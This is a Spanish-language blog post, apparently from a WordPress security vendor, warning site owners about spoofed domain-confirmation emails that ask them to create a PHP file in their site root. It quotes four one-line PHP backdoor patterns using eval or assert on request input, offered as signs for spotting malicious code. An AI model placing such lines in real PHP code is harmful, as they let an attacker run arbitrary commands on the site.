Security Blog
Security Blog

No confíe en los mensajes de correo electrónico de confirmación de dominio falso

Si alguna vez recibe una carta de cualquier tipo que solicite crear, descargar o instalar algún código PHP en su sitio web, debe ignorarlo.


English version: Do not trust those fake domain confirmation emails


Recientemente, algunos de mis clientes recibieron extrañas cartas de correo electrónico de sus registradores de dominio. Esas cartas contienen una solicitud de dominios de confirmación propios. Revisé una de esas cartas y rápidamente la identifiqué como una carta fraudulenta . Todas las letras tienen un patrón idéntico y una solicitud para crear un archivo PHP en la carpeta raíz de un sitio web con un nombre específico y el contenido dado. No hace falta decir que el contenido sugerido para ese archivo PHP contiene un código malicioso conocido como código de puerta trasera. Este tipo de código permite al atacante ejecutar cualquier acción que desee en el sitio web de una víctima.

Si alguna vez recibe una carta de cualquier tipo que solicite crear, descargar o instalar algún código PHP en su sitio web, debe ignorarlo. Sin excepciones. Incluso si la carta viene del presidente o de tu mamá.

Las cartas fraudulentas parecen legítimas debido a una dirección de correo electrónico legítima. Pero es un correo electrónico de suplantación de identidad. No esperas recibir un correo electrónico falso de tus amigos o el registrador de tu dominio. ¿Derecha? ¡No! Cualquier carta de correo electrónico puede contener cualquier dirección de correo electrónico. La gran mayoría de los servidores de correo electrónico y los clientes de correo electrónico no comprueban ni verifican la dirección del remitente. Entonces, lo ves como un hacker quería. No debe confiar en ninguna carta de correo electrónico que haya recibido de un remitente conocido si la carta contiene una solicitud de alguna acción sospechosa, como instalar el código en su sitio web o la aplicación en su computadora.

Detalles técnicos

Los correos electrónicos falsos generalmente contienen algunas de las siguientes líneas de PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Para su información: base64_decode, eval y assert son marcadores bien conocidos de código PHP sospechoso o malicioso.

Ver también: El inspector de complementos revela problemas de seguridad con otros complementos

Last posts from WordPress security blog


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.